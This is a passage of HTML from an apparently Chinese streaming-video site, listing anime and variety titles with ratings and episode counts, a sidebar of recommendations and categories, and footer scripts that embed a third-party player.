				<article class="u-movie"><div class="list-poster"><a title="一周的说唱歌手" href="/gresource/110883/"><img class="thumb" height="200" src="/upload/vod/2021-04-28/16195769041.jpg"></a><div class="pingfen"><span>7.2</span></div><div class="zhuangtai"><span>最新20210731期</span></div></div><h2><a href="/gresource/110883/" title="一周的说唱歌手">一周的说唱歌手</a></h2><div class="meta"><span class="tags">综艺</span></div>
				
				</article>
				
				
				</div>
				
		
			</div>
		</div>
		


				
		<div class="m-movies clearfix"> 
			<div class="update_list"> 
				<div class="list_menu list_menu_l" mod="new"> 
				<strong><span class="glyphicon glyphicon-stats" style="color: #2581BA;"></span></strong>
				<ul> 
				<li mod="new" class="list_menuli">高清丶动漫新番</li>
                                <a class="more" href="/cartoon/">更多&gt;&gt;</a>
				</ul>
				</div> 
				
				<div class="update_list_con" style="display: block;"> 
				
	    
				<article class="u-movie"><div class="list-poster"><a title="希尔达第一季" href="/gresource/115578/"><img class="thumb" height="200" src="/upload/vod/2021-08-05/16281523341.jpg"></a><div class="pingfen"><span>6.0</span></div><div class="zhuangtai"><span>更新至03集</span></div></div><h2><a href="/gresource/115578/" title="希尔达第一季">希尔达第一季</a></h2><div class="meta"><span class="tags">动漫</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="奇奇与蒂蒂第一季" href="/gresource/115472/"><img class="thumb" height="200" src="/upload/vod/2021-07-30/16276310970.jpg"></a><div class="pingfen"><span>4.0</span></div><div class="zhuangtai"><span>更新至01集</span></div></div><h2><a href="/gresource/115472/" title="奇奇与蒂蒂第一季">奇奇与蒂蒂第一季</a></h2><div class="meta"><span class="tags">动漫</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="残次品·放逐星空" href="/gresource/115495/"><img class="thumb" height="200" src="/upload/vod/2021-07-31/16277395900.jpg"></a><div class="pingfen"><span>10.0</span></div><div class="zhuangtai"><span>更新至02集</span></div></div><h2><a href="/gresource/115495/" title="残次品·放逐星空">残次品·放逐星空</a></h2><div class="meta"><span class="tags">动漫</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="飞狗MOCO之家有小短腿" href="/gresource/89611/"><img class="thumb" height="200" src="/upload/vod/2021-04-09/16179004467.jpg"></a><div class="pingfen"><span>8.0</span></div><div class="zhuangtai"><span>更至30集/共51集</span></div></div><h2><a href="/gresource/89611/" title="飞狗MOCO之家有小短腿">飞狗MOCO之家有小短腿</a></h2><div class="meta"><span class="tags">动漫</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="动态漫画·我能看到成功率" href="/gresource/114246/"><img class="thumb" height="200" src="/upload/vod/2021-06-21/16242724270.jpg"></a><div class="pingfen"><span>5.0</span></div><div class="zhuangtai"><span>更新至7集</span></div></div><h2><a href="/gresource/114246/" title="动态漫画·我能看到成功率">动态漫画·我能看到成功率</a></h2><div class="meta"><span class="tags">动漫</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="龙王殿" href="/gresource/114241/"><img class="thumb" height="200" src="/upload/vod/2021-07-31/202107311627668035.jpg"></a><div class="pingfen"><span>8.3</span></div><div class="zhuangtai"><span>更至19集/共50集</span></div></div><h2><a href="/gresource/114241/" title="龙王殿">龙王殿</a></h2><div class="meta"><span class="tags">动漫</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="前无古人" href="/gresource/114240/"><img class="thumb" height="200" src="/upload/vod/2021-07-31/202107311627667464.jpg"></a><div class="pingfen"><span>8.4</span></div><div class="zhuangtai"><span>更至19集/共26集</span></div></div><h2><a href="/gresource/114240/" title="前无古人">前无古人</a></h2><div class="meta"><span class="tags">动漫</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="枪火天灵 第1季" href="/gresource/89707/"><img class="thumb" height="200" src="/upload/vod/2021-05-07/202105071620375047.jpg"></a><div class="pingfen"><span>7.1</span></div><div class="zhuangtai"><span>更至29集/共30集</span></div></div><h2><a href="/gresource/89707/" title="枪火天灵 第1季">枪火天灵 第1季</a></h2><div class="meta"><span class="tags">动漫</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="善良的阿呆 第一季" href="/gresource/89706/"><img class="thumb" height="200" src="/upload/vod/2021-04-09/161790107216.jpg"></a><div class="pingfen"><span>7.3</span></div><div class="zhuangtai"><span>更至40集/共42集</span></div></div><h2><a href="/gresource/89706/" title="善良的阿呆 第一季">善良的阿呆 第一季</a></h2><div class="meta"><span class="tags">动漫</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="异世界中药铺" href="/gresource/65708/"><img class="thumb" height="200" src="/upload/vod/2020-05-08/15889071727.jpg"></a><div class="pingfen"><span>7.0</span></div><div class="zhuangtai"><span>更至71集</span></div></div><h2><a href="/gresource/65708/" title="异世界中药铺">异世界中药铺</a></h2><div class="meta"><span class="tags">动漫</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="无上神帝" href="/gresource/66657/"><img class="thumb" height="200" src="/upload/vod/2020-05-18/15897701460.jpg"></a><div class="pingfen"><span>8.1</span></div><div class="zhuangtai"><span>更至88集</span></div></div><h2><a href="/gresource/66657/" title="无上神帝">无上神帝</a></h2><div class="meta"><span class="tags">动漫</span></div>
				
				</article>
				
				<article class="u-movie"><div class="list-poster"><a title="逆天至尊" href="/gresource/115128/"><img class="thumb" height="200" src="/upload/vod/2021-07-17/16265345201.jpg"></a><div class="pingfen"><span>7.0</span></div><div class="zhuangtai"><span>更至11集/共60集</span></div></div><h2><a href="/gresource/115128/" title="逆天至尊">逆天至尊</a></h2><div class="meta"><span class="tags">动漫</span></div>
				
				</article>
				
				
				</div>
				
		
			</div>
		</div>
		
				
							</div>
</div>
<aside class="sidebar">	
<div class="widget widget_searchbox"><h3 class="title"><strong>寻你所想</strong></h3>
<form class="search-form" action="/index.php?m=vod-search" method="post"><input class="form-control" id="wd" name="wd" type="text" placeholder="请输入关键字" value=""><input class="btn" type="submit" value="站内搜索"></form>
</div>


<div class="widget widget_calendar"><div id="calendar_wrap" class="calendar_wrap"><table id="wp-calendar">
	<caption>2021年8月</caption>
	<thead>
	<tr>
		<th scope="col" title="星期一">一</th>
		<th scope="col" title="星期二">二</th>
		<th scope="col" title="星期三">三</th>
		<th scope="col" title="星期四">四</th>
		<th scope="col" title="星期五">五</th>
		<th scope="col" title="星期六">六</th>
		<th scope="col" title="星期日">日</th>
	</tr>
	</thead>
<!--
<tfoot>
	<tr>
		<td colspan="3" id="prev"><a href="#">&laquo; 3月</a></td>
		<td class="pad">&nbsp;</td>
		<td colspan="3" id="next" class="pad">&nbsp;</td>
	</tr>    
</tfoot> 
-->

	<tbody>

	<tr>
		<td></td><td></td><td></td><td></td><td></td><td></td><td>1</td>
	</tr>
	<tr>
		<td>2</td><td>3</td><td>4</td><td>5</td><td><font color="red">6</font></td><td>7</td><td>8</td>
	</tr>
	<tr>
		<td>9</td><td>10</td><td>11</td><td>12</td><td>13</td><td>14</td><td>15</td>
	</tr>
	<tr>
               <td>16</td><td>17</td><td>18</td><td>19</td><td>20</td><td>21</td> <td>22</td>
       </tr>
       <tr>
		<td>23</td><td>24</td><td>25</td><td>26</td><td>27</td><td>28</td><td>29</td>
	</tr>
	<tr>
		<td>30</td><td>31</td>
	</tr>

	</tbody>

	</table></div></div>
<div class="widget widget_postlist"><h3 class="title"><strong>推荐视频</strong></h3>
<ul class="items-01">		

<li><a href="/gresource/110216/"><span class="thumbnail"><img src="/upload/vod/2021-04-16/16185663849.jpg" class="thumb"></span><span class="text">反叛的鲁路修剧场版2：叛道<br>以面具反叛者ZERO之身份增强反布里塔尼亚势力·黑色骑士团的鲁路修，与被任命为第3皇女尤菲...</span></a></li>

<li><a href="/gresource/112215/"><span class="thumbnail"><img src="/upload/vod/2021-05-17/16212650363.jpg" class="thumb"></span><span class="text">贝索罗<br>影片《甲壳虫》兼具魔幻与写实的风格，故事发生在20世纪20年代的巴西，主人公是一位非裔苦工...</span></a></li>

<li><a href="/gresource/108769/"><span class="thumbnail"><img src="/upload/vod/2021-04-09/161790346511.jpg" class="thumb"></span><span class="text">化骨龙与千年虫[粤语]<br>小混混“化骨龙”与母亲相依为命，因一次撞车，化骨龙被老差骨“千年虫”扣下，所幸龙母的装傻技...</span></a></li>

<li><a href="/gresource/108701/"><span class="thumbnail"><img src="/upload/vod/2021-04-09/16179034312.jpg" class="thumb"></span><span class="text">斗鸡[1990]<br>青年农民田来福与同村的姑娘孙春喜相爱，却因贫穷受到春喜母女的轻视。春喜之母孙大婶以一万块钱...</span></a></li>

<li><a href="/gresource/106186/"><span class="thumbnail"><img src="/upload/vod/2021-04-09/16179019411.jpg" class="thumb"></span><span class="text">《玉石传奇》<br>两千年前，汉王朝的铁骑，保障了西域商路的畅通，丝绸成为古罗马贵族手中的奢侈品，在此之前一千...</span></a></li>

<li><a href="/gresource/87993/"><span class="thumbnail"><img src="/upload/vod/2021-02-14/16133115393.jpg" class="thumb"></span><span class="text">重生空间：大小姐不好惹<br>&nbsp;改编自iCiyuan动漫漫画作品《重生空间：大小姐不好惹》。她，鬼医传人，竟然...</span></a></li>


</ul></div>
		
		<div class="widget widget_text"><h3 class="title"><strong>友情链接</strong></h3>			
		
		<div class="textwidget">
		
		<a href="http://www.kxxer.com/" title="酷小熊影视" target="_blank">酷小熊影视</a>　|　
		
		<a href="http://www.eeuss.cc" title="EEUSS影院" target="_blank">EEUSS影院</a>　|　
		
		<a href="https://www.6080w.cc/" title="6080" target="_blank">6080</a>　|　
		
		<a href="https://www.dhuangm.com/" title="VIP影视" target="_blank">VIP影视</a>　|　
		
		</div>
		</div>
		
		
		
		<div class="widget widget_categories"><h3 class="title"><strong>分类目录</strong></h3>		
<ul>


<li class="cat-item cat-item-7"><a href="/movies/" title="电影">电影</a>
<ul class="children">

<li class="cat-item cat-item-31"><a href="/list01/">动作片</a></li>

<li class="cat-item cat-item-31"><a href="/list02/">喜剧片</a></li>

<li class="cat-item cat-item-31"><a href="/list03/">爱情片</a></li>

<li class="cat-item cat-item-31"><a href="/list04/">科幻片</a></li>

<li class="cat-item cat-item-31"><a href="/list05/">恐怖片</a></li>

<li class="cat-item cat-item-31"><a href="/list06/">剧情片</a></li>

<li class="cat-item cat-item-31"><a href="/list07/">战争片</a></li>


</ul>
</li>


<li class="cat-item cat-item-7"><a href="/teleplay/" title="剧集">剧集</a>
<ul class="children">

<li class="cat-item cat-item-31"><a href="/list08/">大陆剧</a></li>

<li class="cat-item cat-item-31"><a href="/list09/">港台剧</a></li>

<li class="cat-item cat-item-31"><a href="/list10/">日韩剧</a></li>

<li class="cat-item cat-item-31"><a href="/list11/">欧美剧</a></li>


</ul>
</li>


<li class="cat-item cat-item-7"><a href="/variety_show/" title="综艺">综艺</a>
<ul class="children">


</ul>
</li>


<li class="cat-item cat-item-7"><a href="/cartoon/" title="动漫">动漫</a>
<ul class="children">


</ul>
</li>



</ul>
</div><div class="widget widget_postlist"><h3 class="title"><strong>随机推送</strong></h3><ul class="items-01">		

<li><a href="/gresource/89336/"><span class="thumbnail"><img src="/upload/vod/2021-04-08/16178909066.jpg" class="thumb"></span><span class="text">天才女画家<br>1980年4月5日から4月19日まで、NHKの「土曜ドラマ」枠（20:00-21:10）に...</span></a></li>

<li><a href="/gresource/89388/"><span class="thumbnail"><img src="/upload/vod/2021-04-08/16178965735.jpg" class="thumb"></span><span class="text">廉政行动组 粤语中字<br>廉政公署调查员杨大志（郭富城饰）对工作满腔热忱、干劲冲天，即使屡遇挫败，可依旧屡败屡战，坚...</span></a></li>

<li><a href="/gresource/89389/"><span class="thumbnail"><img src="/upload/vod/2021-04-08/16178965736.jpg" class="thumb"></span><span class="text">廉政追缉令 粤语中字<br>本片讲述香港ICAC精英与黑社会、贩毒、走私集团等恶势力斗智斗勇的故事。他们各有专长，屡立...</span></a></li>

<li><a href="/gresource/89386/"><span class="thumbnail"><img src="/upload/vod/2021-04-08/16178968333.jpg" class="thumb"></span><span class="text">金牙大状 粤语中字<br>在一貧窮村落，有一位口才了得的狀師戴亞斗（鄭丹瑞）。村民每有任何冤情申訴，均禮聘他作其狀師...</span></a></li>

<li><a href="/gresource/89387/"><span class="thumbnail"><img src="/upload/vod/2021-04-08/16178968334.jpg" class="thumb"></span><span class="text">雷霆扫毒 粤语中字<br>本剧为2012年无线节目巡礼剧集之一。毒品调查科行动组高级督察向荣（苗侨伟饰）嫉恶如仇，与...</span></a></li>

<li><a href="/gresource/89385/"><span class="thumbnail"><img src="/upload/vod/2021-04-08/161789728918.jpg" class="thumb"></span><span class="text">鉴证实录 粤语中字<br>宝言（陈慧珊饰）为了继承父亲的遗志，为社会捍卫正义，努力成为一名法医。宝言的姐姐宝意（陈美...</span></a></li>

<li><a href="/gresource/89390/"><span class="thumbnail"><img src="https://img.52swat.cn/upload/vod/20210406-1/6aa1aa93c47ea8692aa7443db556025e.jpg#err2021-04-08" class="thumb"></span><span class="text">聊斋 粤语中字<br>　　聊斋之流光情劫（鲁公女）　　聊斋之侠女田郎（田七郎）　　聊斋之翁婿斗法（长亭）　　聊斋...</span></a></li>

<li><a href="/gresource/89409/"><span class="thumbnail"><img src="/upload/vod/2021-04-08/161789666515.jpg" class="thumb"></span><span class="text">超棒少年侦探所 第一季<br>四名聪明的学生成立自己的侦探所，把冒险发布到播客上，成为彼此的可靠好友。...</span></a></li>

<li><a href="/gresource/89427/"><span class="thumbnail"><img src="/upload/vod/2021-04-08/161789502214.jpg" class="thumb"></span><span class="text">星际旅行：深空九号第四季<br>《星际旅行:深空九号》（StarTrek:DeepSpaceNine,简称「DS9」）是第...</span></a></li>

		</ul></div></aside>
</section>
<div class="daytime" id="cover"></div>
<footer class="footer">
        <a href="/about-disclaimer-contact.html" target="_blank" title="关于我们">关于我们</a> - 
	<a href="/about-disclaimer-contact.html" target="_blank" title="免责声明">免责声明</a> - 
	<a href="/about-disclaimer-contact.html" target="_blank" title="联系我们">联系我们</a> - 
	<a href="/index.php?m=gbook-show.html" target="_blank" title="留言求片">留言求片</a> - 
	<a href="/rss.xml" target="_blank" title="网站地图">网站地图</a>
	<br>本站不提供任何视听上传服务，所有内容均来自视频分享站点所提供的公开引用资源。
    <br>Copyright © 2018 - 2020  <a href="/" title="酷小熊影视 - 最新电影电视剧的在线天堂 - kxxer.com" target="_blank">酷小熊影视 - 最新电影电视剧的在线天堂 - kxxer.com.</a> All Rights Reserved   

</footer>


<script type="text/javascript">
if (play_type !="") {
	$('#player').html('<div class="choose" id="choose" ><input id="bt" type="button" value="关灯" onclick="Switch()"></div><iframe class="play" id="vodplay" src="https://api.1suplayer.me/player/?userID=&type='+play_type+'&vkey='+vid+'" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" allowfullscreen="" style="height: 100%;width: 100%;"></iframe><!--div class="change" id="change" style="position: absolute;z-index: 999;right: 410px;"><input id="cp" type="button" value="切换HTML5播放 以支持拖放" onclick="h5()"></div-->');
}
</script>
<script type="text/javascript" src="//apps.bdimg.com/libs/bootstrap/3.2.0/js/bootstrap.min.js?ver=5.2"></script>
<script type="text/javascript" src="/template/kxx/js/hammer.min.js"></script>
<script type="text/javascript" src="/template/kxx/js/custom.js"></script>
<script type="text/javascript" src="/template/kxx/js/wp-embed.min.js"></script>
<script src="/template/kxx/js/get_user_info.php?id="></script>
<script src="/template/kxx/js/button.js"></script>

</l<link><div class="rollto"><a href="javascript:;"></a></div></body></html>